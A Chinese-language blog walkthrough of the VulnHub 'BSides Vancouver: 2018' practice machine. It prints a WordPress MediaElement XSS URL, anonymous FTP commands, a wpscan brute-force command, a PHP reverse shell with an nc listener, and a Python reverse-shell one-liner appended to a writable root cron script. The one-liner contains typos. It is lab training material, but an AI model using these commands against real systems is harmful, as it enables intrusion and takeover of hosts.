渗透测试系列 — VulnHub-BSides Vancouver: 2018 Walkthrough

头晕脑胀,盼盼要回寝室睡觉了。

正文:

1.nmap,dirb,nikto
2.
发现是wordpress
查看网页源码,搜索generator,发现版本
<meta name=”generator” content=”WordPress 4.5″ />
3.查看版本漏洞
全球知名的开源建站程序WordPress 于2016 年5 ?6 号发布新版本4.5.2,其中修了? 个反射型XSS 漏洞(https://www.seebug.org/vuldb/ssvid-91515),直接影响4.2.0 ?4.5.1 版本
http://0day5.com/wp-includes/js/mediaelement/flashmediaelement.swf?jsinitfu%xnction=console.log&isvi%xdeo=true&auto%xplay=true&fi%xle=http://midzer0.github.io/2016/wordpress-4.5.1-xss/exp.m3u8
http://0day5.com/archives/3889/
该反射型XSS 源 于WordPress ?个处理媒体的插件MediaElement,攻击者能够构 造恶意Payload,使之解析媒体?件时触发XSS
4.
找到了那个文件,试了下,xss成功。
由于本人还不会xss的利用,没有进行深层次的测试
一是盗取cookie,二是链接到特定网址触发脚本,等等
5.
nmap的时候发现22端口是ftp,且是anonymous登陆
windows下
ftp
open ip
anonymous
dir
cd public
get users.txt.bk
拿到几个用户名,其他的目录和文件由于权限问题无法操作
6.
去网上搜了下有这个镜像的资料

参考

7.
作者拿到了用户名,直接用kali带的wpscan爆破
爆破
wpscan -u http://192.168.244.146/backup_wordpress/ –username john –wordlist /usr/share/wordlists/rockyou.txt.gz
由于是爆破速度过于慢,用作者的拿到的密码enigma
8.
登陆上去,写php-shell(改本地ip和端口)
如果找不到路径,下载wordpress源码搜路径
攻击机 nc -lvnp 8888
访问网页,获得www-data用户权限
9.
作者是先写cmd命令,python执行
再写python-shell反弹得到用户权限
10.
exp提权,没有试
作者cat /etc/crontab,找到了一个root权限的进程
我试了下,ls -la /usr/local/bin/cleanup   文件也是777权限,可写
作者用python-shell反弹得到root权限

echo "python -c 'import socket,subprocess,os;s=scoket.scoket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.244.129",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ">> cleanup

试了下,发现/bin/sh和-i双引号没有了,导致语法错误;直接写cleanup文件,是有的

总结:

这个靶机的测试暂时到此为止,可以留着对xss深入利用进行学习
 
2018.7.15

发表评论

电子邮件地址不会被公开。 必填项已用*标注